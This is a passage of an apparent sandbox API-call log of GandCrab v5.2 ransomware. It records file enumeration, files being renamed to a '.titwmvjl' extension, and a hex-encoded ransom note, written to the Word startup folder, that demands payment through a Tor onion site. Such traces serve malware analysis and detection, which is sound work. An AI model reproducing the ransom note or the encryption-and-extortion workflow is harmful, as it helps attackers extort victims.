(lpString=".titwmvjl") returned 9 [0079.799] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a09d2ca4deb61a.lock") returned 77 [0079.799] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.800] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 86 [0079.800] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a09d2ca4deb61a.lock") returned 77 [0079.800] lstrlenW (lpString=".lock") returned 5 [0079.800] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.800] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.800] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.800] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.801] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.801] lstrcmpW (lpString1="STARTUP", lpString2=".") returned 1 [0079.801] lstrcmpW (lpString1="STARTUP", lpString2="..") returned 1 [0079.801] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="STARTUP" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0079.801] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0079.801] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.802] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.802] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.802] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.802] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.802] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.803] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\TITWMVJL-DECRYPT.txt") returned 82 [0079.803] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\startup\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0079.803] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\